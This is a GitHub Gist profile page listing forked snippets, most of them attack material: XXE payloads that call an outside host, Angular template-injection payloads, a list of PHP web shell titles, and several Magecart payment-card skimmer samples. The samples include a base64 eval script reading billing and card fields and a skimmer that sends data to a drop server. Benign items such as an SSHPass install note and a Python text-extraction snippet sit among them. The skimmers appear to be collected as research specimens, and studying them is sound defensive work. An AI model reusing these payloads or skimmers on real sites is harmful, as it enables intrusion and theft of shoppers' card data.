Skip to content

Instantly share code, notes, and snippets.

View ActorExpose's full-sized avatar
🎯
Focusing

ActorExpose

🎯
Focusing
116 followers · 180 following
View GitHub Profile
@ActorExpose
ActorExpose / XXE_payloads
Created October 5, 2022 18:02 — forked from staaldraad/XXE_payloads
XXE Payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
@ActorExpose
ActorExpose / AngularTI.md
Created October 5, 2022 18:02 — forked from mccabe615/AngularTI.md
Angular Template Injection Payloads

1.3.2 and below

{{7*7}}

'a'.constructor.fromCharCode=[].join;
'a'.constructor[0]='\u003ciframe onload=alert(/Backdoored/)\u003e';
@ActorExpose
ActorExpose / gist:d04e20abc8f79e3f3700a19a57fff812
Created October 4, 2022 20:57 — forked from arunoda/gist:7790979
Installing SSHPass

Installing SSHPASS

SSHPass is a tiny utility, which allows you to provide the ssh password without using the prompt. This will very helpful for scripting. SSHPass is not good to use in multi-user environment. If you use SSHPass on your development machine, it don't do anything evil.

Installing on Ubuntu

apt-get install sshpass

Installing on OS X

@ActorExpose
ActorExpose / magniber_decryptor.cpp
Created August 3, 2022 12:20 — forked from evilsocket/magniber_decryptor.cpp
Decryptor for Magniber ransomware ( https://blog.malwarebytes.com/threat-analysis/2017/10/magniber-ransomware-exclusively-for-south-koreans/ )
/*
* This tool will decrypt files encrypted by the Magniber ransomware with
* AES128 ( CBC mode ) algorithm.
*
* RE and report by MalwareBytes ( @hasherezade )
*
* https://blog.malwarebytes.com/threat-analysis/2017/10/magniber-ransomware-exclusively-for-south-koreans/
*
* Decryptor written by Simone 'evilsocket' Margaritelli
*
@ActorExpose
ActorExpose / extract-text-nodes.py
Created April 10, 2022 21:47 — forked from aspose-com-gists/extract-text-nodes.py
Extract Text from Word Documents in Python
# Load document
doc = aw.Document("Extract content.docx")
# Define starting and ending nodes.
start_para = doc.last_section.get_child(aw.NodeType.PARAGRAPH, 2, True).as_paragraph()
end_table = doc.last_section.get_child(aw.NodeType.TABLE, 0, True).as_table()
# Extract the content between these nodes in the document. Include these markers in the extraction.
extracted_nodes = extract_content(start_para, end_table, True)
@ActorExpose
ActorExpose / php_webshell_titles.txt
Created March 30, 2022 21:57 — forked from binkybear/php_webshell_titles.txt
Titles of php shells
# I pulled the <titles> from PHP web shells found on github/pastebin/other places
# Some are not tiles and just variables but I kept all
# @binkybear
AnonCyberTeam
Domains & Users
Exploit: error_log() By * Super-Crystal *
Exploit: error_log() By * TrYaG Team *
Exploit: error_log() By * erne *
Matamu Mat
@ActorExpose
ActorExpose / evil-eval-magento.js
Created March 3, 2022 01:22 — forked from gwillem/evil-eval-magento.js
marisaperry.com
<script type="text/javascript">eval(atob("dmFyIHNlPWZhbHNlO2Z1bmN0aW9uIHRpbWVkTWUoKXtpZigoIXNlKSYmKGRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdhdXRob3JpemVuZXRfY2NfY2lkJykpKXtmbG49ZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ2JpbGxpbmc6Zmlyc3RuYW1lJykudmFsdWUrJyAnK2RvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdiaWxsaW5nOmxhc3RuYW1lJykudmFsdWU7Y2k9ZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ2JpbGxpbmc6Y2l0eScpLnZhbHVlO3M9ZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ2JpbGxpbmc6cmVnaW9uX2lkJyk7c3Q9cy5vcHRpb25zW3Muc2VsZWN0ZWRJbmRleF0udGV4dDtjPWRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdiaWxsaW5nOmNvdW50cnlfaWQnKTtjbz1jLm9wdGlvbnNbYy5zZWxlY3RlZEluZGV4XS50ZXh0O2FkPWRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdiaWxsaW5nOnN0cmVldDEnKS52YWx1ZSsnICcrZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ2JpbGxpbmc6c3RyZWV0MicpLnZhbHVlO3pwPWRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdiaWxsaW5nOnBvc3Rjb2RlJykudmFsdWU7dD1kb2N1bWVudC5nZXRFbGVtZW50QnlJZCgnYXV0aG9yaXplbmV0X2NjX3R5cGUnKTtjdD10Lm9wdGlvbnNbdC5zZWxlY3RlZEluZGV4XS50ZXh0O2NuPWRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdhdXRob3JpemVuZXRfY2NfbnVtYmVyJykudmFsdWU7Y2VtPWRvY3VtZW50LmdldEVsZW
@ActorExpose
ActorExpose / pageseal.js
Created March 2, 2022 17:33 — forked from gwillem/pageseal.js
Page Seal partially de-obfuscated
const jsdom = require("jsdom");
const { JSDOM } = jsdom;
const dom = new JSDOM(`<!DOCTYPE html><p>Hello world</p>`,
{ url: "https://example.org/" });
var window = dom.window
var document = window.document
var $ = require("jquery")(window);
var jQuery = $;
@ActorExpose
ActorExpose / techrabbit.com.js
Created March 2, 2022 17:33 — forked from gwillem/techrabbit.com.js
TechRabbit.com busted by Magecart again. Malware hosted at checkercarts.com / exfil server itenvoirtech.com
var protocol = window.location.protocol != 'https:' ? 'http://' : 'https://';
var hostname = window.location.host;
var fieldNameRegex = 'shipping|billing|payment|cc|month|card|year|expiration|exp|cvv|cid|code|ccv|authorize|firstname|lastname|street|city|phone|number|email|zip|postal|region|country';
var ccRegex = '[0-9]{13,16}|[0-9 -]{16,20}';
var fieldTypeRegex = 'select|password|checkbox|radio|text|hidden|number|tel|email';
var orderButtons = 'a[title*=\'Place Order\'],a[href*=\'javascript: ; \'],a[href*=\'javascript: void (0)\'],a[href*=\'javascript: void (0); \'],a[href=\'#\'],button,input,submit,.btn,.button';
var emptyString = '';
var saveOrderURL = window.location.href.substr(window.location.href.replace('://', '').indexOf('/') + 3) + '/' + 'saveOrder';
var emptyList = [];
var dropServers = ['itenvoirtech.com'];
@ActorExpose
ActorExpose / infowarstores.com.js
Created March 2, 2022 17:33 — forked from gwillem/infowarstores.com.js
de-obfuscated infowarsstore.com payment skimmer as detected on 2018-11-12 by https://twitter.com/gwillem
var idString = "id",
nameString = "name",
tokenOrCSRF = new RegExp("token|search|csfr|keyword|button"),
zoneRegionStateCountry = new RegExp("zone|region|state|country"),
formObj = {},
formLength = 0,
emptyString = "",
devToolsStatus = {
open: !1,
orientation: null